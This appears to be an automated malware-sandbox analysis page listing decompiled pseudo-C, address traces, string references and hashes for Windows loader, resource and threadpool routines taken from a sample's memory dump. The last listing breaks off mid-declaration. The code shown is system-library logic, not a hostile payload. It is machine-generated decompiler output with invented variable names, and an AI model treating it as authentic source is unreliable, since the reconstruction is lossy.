0x3290e38c
0x3290e38f
0x3290e394
0x3290e397
0x3290e39a
0x3290e39c
0x3290e4f6
0x3290e505
0x3290e50a
0x3290e50e
0x3290e514
0x3290e517
0x3290e51d
0x3290e51d
0x3290e51f
0x3290e51f
0x3290e524
0x3290e557
0x3290e558
0x3290e55a
0x3290e55f
0x3290e55f
0x3290e562
0x3290e562
0x3290e569
0x3290e571
0x3290e57d
0x3290e57d
0x3290e529
0x3290e54a
0x3290e554
0x3290e554
0x00000000
0x3290e54a
0x3290e52b
0x3290e52d
0x3290e533
0x3290e540
0x3290e544
0x00000000
0x3290e544
0x3290e3a2
0x3290e3a5
0x3290e4b5
0x3290e4c4
0x3290e4c9
0x3290e4cc
0x3290e4d4
0x3290e4e2
0x3290e4e5
0x00000000
0x3290e4e5
0x3290e4dc
0x3290e4dd
0x00000000
0x3290e4dd
0x3290e3ae
0x3290e3e7
0x3290e3e9
0x3290e3ea
0x3290e3ed
0x3290e3f3
0x3290e3f4
0x3290e3f5
0x3290e3f6
0x3290e3fa
0x3290e3fb
0x3290e402
0x3290e405
0x3290e41b
0x3290e41d
0x3290e422
0x3290e431
0x3290e432
0x3290e435
0x3290e436
0x3290e43b
0x3290e43c
0x3290e43e
0x3290e443
0x3290e448
0x00000000
0x00000000
0x3290e44e
0x3290e450
0x3290e452
0x3290e452
0x3290e458
0x3290e464
0x00000000
0x00000000
0x3290e46e
0x3290e470
0x3290e470
0x3290e488
0x3290e48d
0x3290e490
0x3290e495
0x00000000
0x00000000
0x3290e49b
0x3290e4a8
0x00000000
0x3290e4a8
0x3290e424
0x00000000
0x3290e424
0x3290e3b0
0x3290e3b1
0x3290e3b6
0x3290e3b7
0x3290e3b9
0x3290e3be
0x3290e3c3
0x00000000
0x00000000
0x3290e3cf
0x3290e3da
0x3290e3df
0x3290e3d1
0x3290e3d1
0x3290e3d6
0x3290e3d6
0x3290e3e1
0x00000000

Strings

UEFI, xrefs: 3290E3D1
Legacy, xrefs: 3290E3DA

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 1623e4fa93effe17ca0a6437fe03504de2ee94f917231296e9a1975a8b5313bd
Instruction ID: 65c938f4806b51c694e086d52d6139c6341f90edb4e3c03add48c2922df62d61
Opcode Fuzzy Hash: 1623e4fa93effe17ca0a6437fe03504de2ee94f917231296e9a1975a8b5313bd
Instruction Fuzzy Hash: 34615CB6A0030D9FDB14CFA8C840AADB7B9FF48744F50846AE599EB251EB70D944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 328AF640 Relevance: 2.7, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E328AF640(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t76;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t96;
				signed int _t99;
				signed int _t109;
				signed int _t114;
				signed int _t117;
				void* _t120;
				intOrPtr _t123;
				signed int _t128;
				signed int _t129;
				intOrPtr _t135;
				intOrPtr _t137;
				void* _t139;
				void* _t141;

				_push("true");
				_push(0x3296c3a0);
				E328E7BE4(__ebx, __edi, __esi);
				_t137 =  *[fs:0x18];
				 *((intOrPtr*)(_t139 - 0x24)) = _t137;
				_t74 =  *[fs:0x30];
				 *((intOrPtr*)(_t139 - 0x2c)) =  *[fs:0x30];
				_t128 =  *(_t137 + 0xfb4);
				 *(_t139 - 0x20) = _t128;
				if(_t128 != 0) {
					_push(1);
					_t121 = _t128;
					E32894779(_t74, _t128);
				}
				if(( *( *[fs:0x18] + 0xfca) & 0x00000008) != 0) {
					_t76 =  *[fs:0x18];
					__eflags =  *(_t76 + 0xfca) & 0x00000020;
					if(( *(_t76 + 0xfca) & 0x00000020) == 0) {
						L26:
						_t109 = 0;
						L19:
						__eflags = _t128;
						if(_t128 != 0) {
							 *(_t137 + 0xfb4) = _t109;
							_push(2);
							_t121 = _t128;
							E32894779(_t76, _t128);
						}
						_t129 =  *(_t137 + 0xf94);
						__eflags = _t129;
						if(_t129 != 0) {
							 *(_t137 + 0xf94) = _t109;
							E3289FED0(0x32985b40);
							_push(0x32985b40);
							E3289E740(_t111);
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109, _t129);
						}
						__eflags =  *(_t137 + 0xfca) & 0x00000004;
						if(( *(_t137 + 0xfca) & 0x00000004) != 0) {
							 *(_t137 + 0x10) = _t109;
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109,  *(_t137 + 0x10));
						}
						E328C4940();
						_t85 = 0x400;
						__eflags =  *(_t137 + 0xfca) & 0x00000400;
						if(( *(_t137 + 0xfca) & 0x00000400) != 0) {
							__eflags =  *0x329865f4 - 3;
							if( *0x329865f4 == 3) {
								_t85 = E32964080(_t111, _t121);
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t139 - 0x10));
						return _t85;
					}
				}
				_t76 = 0x2000;
				if(( *(_t137 + 0xfca) & 0x00002000) != 0) {
					goto L26;
				}
				_t111 = 0x1000;
				_t109 = 0;
				if(( *( *[fs:0x18] + 0xfca) & 0x00001000) != 0) {
					 *((char*)(_t139 - 0x19)) = 1;
				} else {
					 *((char*)(_t139 - 0x19)) = 0;
					_t111 = 0;
					E328B19DF(0);
				}
				E328B2755(_t121);
				 *(_t139 - 4) = _t109;
				_t89 =  *0x32985da0; // 0x257c450
				while(_t89 != 0x32985d9c) {
					_t16 = _t89 - 0x10; // 0x257c440
					_t123 = _t16;
					 *((intOrPtr*)(_t139 - 0x30)) = _t123;
					_t18 = _t89 + 4; // 0x257cc90
					_t96 =  *_t18;
					 *((intOrPtr*)(_t139 - 0x28)) = _t96;
					 *((intOrPtr*)(_t139 - 0x38)) = _t96;
					_t21 = _t123 + 0x34; // 0x8a2cc
					_t111 =  *_t21;
					_t24 = _t123 + 0x18; // 0x76740000
					if( *((intOrPtr*)( *((intOrPtr*)(_t139 - 0x2c)) + 8)) !=  *_t24 && (_t111 & 0x00040000) == 0) {
						_t27 = _t123 + 0x1c; // 0x76775cd0
						_t99 =  *_t27;
						 *(_t139 - 0x34) = _t99;
						if(_t99 != 0 && _t111 == 0x80004) {
							 *(_t139 - 0x3c) = _t99;
							 *((intOrPtr*)(_t139 - 0x60)) = 0x24;
							 *(_t139 - 0x5c) = 1;
							_t117 = 7;
							memset(_t139 - 0x58, 0, _t117 << 2);
							_t141 = _t141 + 0xc;
							_t34 = _t123 + 0x48; // 0x0
							L328ADC40(_t139 - 0x60,  *_t34);
							 *(_t139 - 4) = 1;
							_t135 =  *((intOrPtr*)(_t139 - 0x30));
							_t155 =  *((intOrPtr*)(_t135 + 0x3a)) - _t109;
							if( *((intOrPtr*)(_t135 + 0x3a)) != _t109) {
								_t120 = 3;
								E328AF0A3(_t109, _t120, _t135, _t135, _t137, _t155);
							}
							_push(_t109);
							_push(3);
							_t111 =  *(_t139 - 0x34);
							L328ADCD1(_t109,  *(_t139 - 0x34),  *((intOrPtr*)(_t135 + 0x18)), _t135, _t137, _t155);
							 *(_t139 - 4) = _t109;
							_t128 =  *(_t139 - 0x20);
							E328AF85E();
						}
					}
					_t89 =  *((intOrPtr*)(_t139 - 0x28));
				}
				_t121 =  *0x32985b24; // 0x2552ce0
				__eflags =  *((intOrPtr*)(_t121 + 0x3a)) - _t109;
				if( *((intOrPtr*)(_t121 + 0x3a)) != _t109) {
					 *((intOrPtr*)(_t139 - 0x84)) = 0x24;
					 *(_t139 - 0x80) = 1;
					_t114 = 7;
					__eflags = 0;
					memset(_t139 - 0x7c, 0, _t114 << 2);
					_t49 = _t121 + 0x48; // 0x0
					L328ADC40(_t139 - 0x84,  *_t49);
					 *(_t139 - 4) = 2;
					_t121 =  *0x32985b24; // 0x2552ce0
					_t111 = 3;
					E328AF0A3(_t109, _t111, _t121, _t139 - 0x7c + _t114, _t137, __eflags);
					 *(_t139 - 4) = _t109;
					_t128 =  *(_t139 - 0x20);
					E328AF87D();
				}
				 *(_t139 - 4) = 0xfffffffe;
				E328AF867(_t109, _t111);
				_t76 = E328C6540(_t111);
				goto L19;
			}

0x328af640
0x328af642
0x328af647
0x328af64c
0x328af653
0x328af656
0x328af65c
0x328af65f
0x328af665
0x328af66a
0x328af66c
0x328af66e
0x328af670
0x328af670
0x328af682
0x328f9c28
0x328f9c2e
0x328f9c35
0x328af857
0x328af857
0x328af7da
0x328af7da
0x328af7dc
0x328af7de
0x328af7e4
0x328af7e6
0x328af7e8
0x328af7e8
0x328af7ed
0x328af7f3
0x328af7f5
0x328af82b
0x328af836
0x328af83b
0x328af840
0x328af850
0x328af850
0x328af7f7
0x328af7fe
0x328f9c79
0x328f9c87
0x328f9c87
0x328af804
0x328af809
0x328af80e
0x328af815
0x328f9c91
0x328f9c98
0x328f9c9e
0x328f9c9e
0x328f9c98
0x328af81e
0x328af82a
0x328af82a
0x328f9c3b
0x328af688
0x328af694
0x00000000
0x00000000
0x328af6a0
0x328af6a5
0x328af6ae
0x328f9c40
0x328af6b4
0x328af6b4
0x328af6b7
0x328af6b9
0x328af6b9
0x328af6be
0x328af6c3
0x328af6c6
0x328af6cb
0x328af6d6
0x328af6d6
0x328af6d9
0x328af6dc
0x328af6dc
0x328af6df
0x328af6e2
0x328af6e5
0x328af6e5
0x328af6ee
0x328af6f1
0x328af6fb
0x328af6fb
0x328af6fe
0x328af703
0x328af713
0x328af716
0x328af71d
0x328af726
0x328af72c
0x328af72c
0x328af72e
0x328af734
0x328af739
0x328af740
0x328af743
0x328af747
0x328af74d
0x328af74e
0x328af74e
0x328af753
0x328af754
0x328af759
0x328af75c
0x328af761
0x328af764
0x328af767
0x328af767
0x328af703
0x328af76c
0x328af76c
0x328af774
0x328af77a
0x328af77e
0x328af780
0x328af78a
0x328af793
0x328af794
0x328af799
0x328af79b
0x328af7a4
0x328af7a9
0x328af7b0
0x328af7b8
0x328af7b9
0x328af7be
0x328af7c1
0x328af7c4
0x328af7c4
0x328af7c9
0x328af7d0
0x328af7d5
0x00000000

Strings

$, xrefs: 328AF716
$, xrefs: 328AF780

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: 485b70f1477717489df35c5759d2de2dfbc104d91e55da389210f92475269820
Instruction ID: 7b30ac22c3ebd0a07707fc46be9e22c6cd7276371ad6714511536f8afc31c3ad
Opcode Fuzzy Hash: 485b70f1477717489df35c5759d2de2dfbc104d91e55da389210f92475269820
Instruction Fuzzy Hash: 7661E0B9A01749DFEB20CFA8C5A0BADB7F1FF54708F104469D5196B680CFB6A941CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3289A1E3 Relevance: 2.6, Strings: 2, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E3289A1E3(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				short _v22;
				char _v24;
				char* _v28;
				short _v30;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t34;
				short _t35;
				signed int* _t37;
				signed char* _t38;
				signed int _t39;
				signed char* _t40;
				intOrPtr* _t43;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t49;
				signed int _t53;
				signed char* _t58;
				short _t61;
				intOrPtr* _t63;
				intOrPtr _t68;
				signed int _t71;
				signed int _t72;

				_v16 = __edx;
				_t72 = 0;
				_t68 = __ecx;
				_v8 = 0;
				_t61 = 0x42;
				_push("true");
				_pop(_t34);
				_v22 = _t34;
				_t58 = 0x7ffe0385;
				_push("true");
				_pop(_t35);
				_v32 = _t35;
				_v12 = __ecx;
				_v24 = _t61;
				_v20 = L"RtlpResUltimateFallbackInfo Enter";
				_t37 =  *( *[fs:0x30] + 0x50);
				_v30 = _t61;
				_v28 = L"RtlpResUltimateFallbackInfo Exit";
				if(_t37 != 0) {
					__eflags =  *_t37;
					if(__eflags == 0) {
						goto L1;
					}
					_t38 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					L2:
					_t73 = 0x7ffe0384;
					if(( *_t38 & 0x00000001) != 0) {
						_t39 = L328A3C40();
						__eflags = _t39;
						if(_t39 == 0) {
							_t40 = 0x7ffe0384;
						} else {
							_t40 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						L3291FC01( &_v24,  *_t40 & 0x000000ff);
						_t68 = _v12;
					}
					if(_t68 == 0) {
						L28:
						return 0xc000000d;
					} else {
						_t43 = _a4;
						if(_t43 == 0) {
							goto L28;
						}
						_t63 = _a8;
						_t79 = _t63;
						if(_t63 == 0) {
							goto L28;
						}
						 *_t43 = _t72;
						 *_t63 = _t72;
						_t45 = E3289B5E0(_t58, _t72, _t73, _t79, _t68, _v16,  &_v8, _a12, 1);
						if(_t45 >= 0) {
							_t46 = _v8;
							__eflags = _t46;
							if(_t46 == 0) {
								L17:
								_t72 = 0xc0000001;
								L14:
								_t47 = L328A3C40();
								__eflags = _t47;
								if(_t47 != 0) {
									_t58 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
								}
								__eflags =  *_t58 & 0x00000001;
								if(( *_t58 & 0x00000001) != 0) {
									_t49 = L328A3C40();
									__eflags = _t49;
									if(_t49 != 0) {
										_t73 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
										__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
									}
									L3291FC01( &_v32,  *_t73 & 0x000000ff);
									goto L16;
								} else {
									L16:
									return _t72;
								}
							}
							__eflags = _t46 - 0xffffffff;
							if(_t46 == 0xffffffff) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x7c)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x7c)) == _t72) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t46 + 0x80)) - _t72;
							if( *((intOrPtr*)(_t46 + 0x80)) == _t72) {
								goto L17;
							}
							_t71 =  *(_t46 + 0x18);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L17;
							}
							_t53 = _t46 +  *((intOrPtr*)(_t46 + 0x7c));
							__eflags = _t53;
							 *_a8 = _t71;
							 *_a4 = _t53;
							goto L14;
						}
						return _t45;
					}
				}
				L1:
				_t38 = _t58;
				goto L2;
			}

0x3289a1f0
0x3289a1f3
0x3289a1f5
0x3289a1f7
0x3289a1fa
0x3289a1fb
0x3289a1fd
0x3289a1fe
0x3289a202
0x3289a207
0x3289a209
0x3289a20a
0x3289a214
0x3289a217
0x3289a21b
0x3289a222
0x3289a225
0x3289a229
0x3289a232
0x328f2965
0x328f2967
0x00000000
0x00000000
0x328f2976
0x3289a23a
0x3289a23d
0x3289a242
0x328f2980
0x328f2985
0x328f2987
0x328f2999
0x328f2989
0x328f2992
0x328f2992
0x328f29a1
0x328f29a6
0x328f29a6
0x3289a24a
0x328f29ea
0x00000000
0x3289a250
0x3289a250
0x3289a255
0x00000000
0x00000000
0x3289a25b
0x3289a25e
0x3289a260
0x00000000
0x00000000
0x3289a26b
0x3289a274
0x3289a277
0x3289a27e
0x3289a287
0x3289a28a
0x3289a28c
0x3289a2ce
0x3289a2ce
0x3289a2b4
0x3289a2b4
0x3289a2b9
0x3289a2bb
0x328f29b7
0x328f29b7
0x3289a2c1
0x3289a2c4
0x328f29c2
0x328f29c7
0x328f29c9
0x328f29d4
0x328f29d4
0x328f29d4
0x328f29e0
0x00000000
0x3289a2ca
0x3289a2ca
0x00000000
0x3289a2ca
0x3289a2c4
0x3289a28e
0x3289a291
0x00000000
0x00000000
0x3289a293
0x3289a296
0x00000000
0x00000000
0x3289a298
0x3289a29e
0x00000000
0x00000000
0x3289a2a0
0x3289a2a3
0x3289a2a5
0x00000000
0x00000000
0x3289a2aa
0x3289a2aa
0x3289a2ad
0x3289a2b2
0x00000000
0x3289a2b2
0x3289a284
0x3289a284
0x3289a24a
0x3289a238
0x3289a238
0x00000000

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 3289A21B
RtlpResUltimateFallbackInfo Exit, xrefs: 3289A229

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: b0b90779eaef248f67a408f1df4d5c4e4fe8848fb7730a890e290ae9d309a58d
Instruction ID: ba5361ae134acb9f366f1d2d476829dcdc982fc3eda3f015f6416b11f2c28453
Opcode Fuzzy Hash: b0b90779eaef248f67a408f1df4d5c4e4fe8848fb7730a890e290ae9d309a58d
Instruction Fuzzy Hash: 0F418B7DB00749EFEB05CF99D850B9AB7B4EF85748F2040A5EC18DB2A5EA76D940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 3292314A Relevance: 2.6, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E3292314A(void* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v44;
				char* _v48;
				short _v50;
				char _v52;
				char* _v56;
				short _v58;
				char _v60;
				intOrPtr* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t29;
				short _t30;
				void* _t31;
				signed char* _t32;
				void* _t42;
				signed char* _t46;
				signed char* _t53;
				void* _t54;
				short _t57;
				intOrPtr* _t61;
				void* _t65;
				void* _t67;
				signed char* _t69;
				void* _t70;
				signed int _t72;

				_t63 = __edx;
				_t74 = (_t72 & 0xfffffff8) - 0x3c;
				_v8 =  *0x3298b370 ^ (_t72 & 0xfffffff8) - 0x0000003c;
				_t65 = __ecx;
				_v64 = __edx;
				_t57 = 0x2e;
				_push("true");
				_pop(_t29);
				_push("true");
				_v58 = _t29;
				_pop(_t30);
				_v60 = _t57;
				_v56 = L"LdrResGetRCConfig Enter";
				_v52 = _t30;
				_v50 = _t57;
				_v48 = L"LdrResGetRCConfig Exit";
				_t31 = L328A3C40();
				_t53 = 0x7ffe0385;
				if(_t31 == 0) {
					_t32 = 0x7ffe0385;
				} else {
					_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				_t69 = 0x7ffe0384;
				if(( *_t32 & 0x00000001) != 0) {
					if(L328A3C40() == 0) {
						_t46 = 0x7ffe0384;
					} else {
						_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_t63 =  *_t46 & 0x000000ff;
					L3291FC01( &_v60,  *_t46 & 0x000000ff);
				}
				if(_v64 == 0 || _t65 == 0 || _t65 == 0xffffffff) {
					_t66 = 0xc000000d;
					goto L14;
				} else {
					_push(5);
					_push("true");
					_push( &_v36);
					_push( &_v44);
					_push(_t65);
					_t42 = E328D2AA0();
					_t66 = _t42;
					if(_t42 < 0) {
						L20:
						_pop(_t67);
						_pop(_t70);
						_pop(_t54);
						return E328D4B50(_t66, _t54, _v8 ^ _t74, _t63, _t67, _t70);
					}
					_t61 = _v64;
					 *_t61 = _v28;
					 *((intOrPtr*)(_t61 + 4)) = _v24;
					L14:
					if(L328A3C40() != 0) {
						_t53 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t53 & 0x00000001) != 0) {
						if(L328A3C40() != 0) {
							_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_t63 =  *_t69 & 0x000000ff;
						L3291FC01( &_v52,  *_t69 & 0x000000ff);
					}
					goto L20;
				}
			}

0x3292314a
0x32923152
0x3292315c
0x32923165
0x32923167
0x3292316b
0x3292316c
0x3292316e
0x3292316f
0x32923171
0x32923176
0x32923177
0x3292317c
0x32923184
0x32923189
0x3292318e
0x32923196
0x3292319b
0x329231a2
0x329231b4
0x329231a4
0x329231ad
0x329231ad
0x329231b9
0x329231be
0x329231c7
0x329231d9
0x329231c9
0x329231d2
0x329231d2
0x329231db
0x329231e2
0x329231e2
0x329231ec
0x32923224
0x00000000
0x329231f7
0x329231f7
0x329231f9
0x329231ff
0x32923204
0x32923205
0x32923206
0x3292320b
0x3292320f
0x3292326a
0x32923270
0x32923271
0x32923272
0x3292327d
0x3292327d
0x32923211
0x32923219
0x3292321f
0x32923229
0x32923230
0x3292323b
0x3292323b
0x32923244
0x3292324d
0x32923258
0x32923258
0x3292325e
0x32923265
0x32923265
0x00000000
0x32923244

Strings

LdrResGetRCConfig Exit, xrefs: 3292318E
LdrResGetRCConfig Enter, xrefs: 3292317C

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 913011488de3febd74e9b6cb486b45f9f46f847ace34e935d30812fde9e4f40c
Instruction ID: 4be8e9a76e80be7fbc72c2423c18b9dde4acba4397cd3e9659f556a3f7fda60a
Opcode Fuzzy Hash: 913011488de3febd74e9b6cb486b45f9f46f847ace34e935d30812fde9e4f40c
Instruction Fuzzy Hash: 213122792083889FE301CB69D854B2AB7E8EF88714F000869FC60CB385EF70D905CB56

Uniqueness

Uniqueness Score: -1.00%

Function 328C33D0 Relevance: 2.6, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E328C33D0(signed int* __ecx, signed int __edx, void* _a4) {
				signed int _v8;
				void* _t17;
				signed int* _t26;
				signed int _t29;
				void* _t34;
				signed int _t41;

				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t26 = __ecx;
				_t41 = __edx;
				if(__ecx == 0 || __edx == 0) {
					_push(_t41);
					_push(_t26);
					L3291EF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Map        : 0x%p\nSXS:    EntryCount : 0x%lx\n", "RtlpInitializeAssemblyStorageMap");
					_t17 = 0xc000000d;
				} else {
					_t34 = _a4;
					if(_t34 == 0) {
						_push("true");
						_pop(_t29);
						_t17 = L328C4CF8( &_v8, __edx * _t29, __edx * _t29 >> 0x20);
						if(_t17 >= 0) {
							_t34 = L328A5D90( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
							if(_t34 != 0) {
								_v8 = 1;
								goto L3;
							} else {
								_t17 = 0xc0000017;
							}
						}
					} else {
						L3:
						if(_t41 != 0) {
							memset(_t34, 0, _t41 << 2);
						}
						 *_t26 = _v8;
						_t17 = 0;
						_t26[1] = _t41;
						_t26[2] = _t34;
					}
				}
				return _t17;
			}

0x328c33d5
0x328c33d6
0x328c33d7
0x328c33dd
0x328c33df
0x328c33e4
0x32902898
0x32902899
0x329028a8
0x329028b0
0x328c33f2
0x328c33f2
0x328c33f7
0x32902850
0x32902852
0x3290285c
0x32902863
0x3290287c
0x32902880
0x3290288c
0x00000000
0x32902882
0x32902882
0x32902882
0x32902880
0x328c33fd
0x328c33fd
0x328c33ff
0x328c3407
0x328c3407
0x328c340c
0x328c340e
0x328c3410
0x328c3413
0x328c3413
0x328c33f7
0x328c341a

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 3290289A
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3290289F

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 5314934d935e0a72c3b1c3dd215715f748523a120fb8b8769cb30a3d55b9d026
Instruction ID: 0f8223c48b5f8f8cbabf35c888815592b46d917b6c338bd48a5cb30a9489eca4
Opcode Fuzzy Hash: 5314934d935e0a72c3b1c3dd215715f748523a120fb8b8769cb30a3d55b9d026
Instruction Fuzzy Hash: FC11067AF04218AFF71A8A48CC80F5AB7A8DB84754F14C069BE04DB244DB74DD0186A4

Uniqueness

Uniqueness Score: -1.00%

Function 328CA4F0 Relevance: 2.5, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E328CA4F0() {
				char _v1052;
				signed int _v1056;
				void* __ebp;
				intOrPtr _t12;
				void* _t15;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t29;

				_push(L"Cleanup Group");
				_push(L"Threadpool!");
				_push(0);
				_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
				_t12 = E328CA580(_t22, _t23, _t24, _t25, _t29);
				_v1056 = _v1056 & 0x00000000;
				 *0x32986644 = _t12;
				_push( &_v1056);
				_push(0x408);
				_push( &_v1052);
				_push(0x37);
				_t15 = E328D2D10();
				if(_t15 >= 0) {
					if(_v1056 < 4) {
						return 0xc00000e5;
					}
					 *0x32986640 = _v1052 + 1;
					_t19 =  *[fs:0x30];
					 *(_t19 + 0x250) =  *(_t19 + 0x250) & 0x00000000;
					_t20 = _t19 + 0x254;
					 *((intOrPtr*)(_t20 + 4)) = _t20;
					 *_t20 = _t20;
					return 0;
				}
				return _t15;
			}

0x328ca504
0x328ca509
0x328ca50e
0x328ca510
0x328ca513
0x328ca518
0x328ca51d
0x328ca526
0x328ca527
0x328ca530
0x328ca531
0x328ca533
0x328ca53a
0x328ca541
0x00000000
0x328ca56a
0x328ca548
0x328ca54d
0x328ca553
0x328ca55a
0x328ca55f
0x328ca562
0x00000000
0x328ca564
0x328ca569

Strings

Threadpool!, xrefs: 328CA509
Cleanup Group, xrefs: 328CA504

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 87a54db0a6acd5ac123fa784e250e11e33d91cb05fc9fd48a88257df1a5440e6
Instruction ID: 2ece56898f638e3749bc64f7ae4adb670e2906da718f85a5e72dbf4b22fe4a4a
Opcode Fuzzy Hash: 87a54db0a6acd5ac123fa784e250e11e33d91cb05fc9fd48a88257df1a5440e6
Instruction Fuzzy Hash: B501F4B6155744EFE311CF54CD05B62B7E8EB40719F048979E658CBA90E734D904CB45

Uniqueness

Uniqueness Score: -1.00%

Function 3289C6E0 Relevance: 2.2, Strings: 1, Instructions: 960
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E3289C6E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed short _v64;
				char _v65;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* _v140;
				signed char _v144;
				signed int _v148;
				signed int _v152;
				char _v153;
				signed char _v160;
				signed int _v164;
				void* _v168;
				signed int _v172;
				signed short _v176;
				signed short _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _v196;
				signed int _v200;
				char _v204;
				intOrPtr _v208;
				signed int _v212;
				char _v220;
				char _v228;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t428;
				signed int _t429;
				signed int _t435;
